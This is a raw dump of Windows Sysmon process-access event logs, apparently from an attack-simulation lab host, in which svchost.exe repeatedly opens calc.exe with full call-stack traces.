22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360158Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360157Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360156Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360155Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360154Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360153Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360152Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360151Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360150Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360149Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360148Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360147Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360146Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360145Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360144Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360143Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360142Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360141Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360140Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360139Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360138Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360137Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 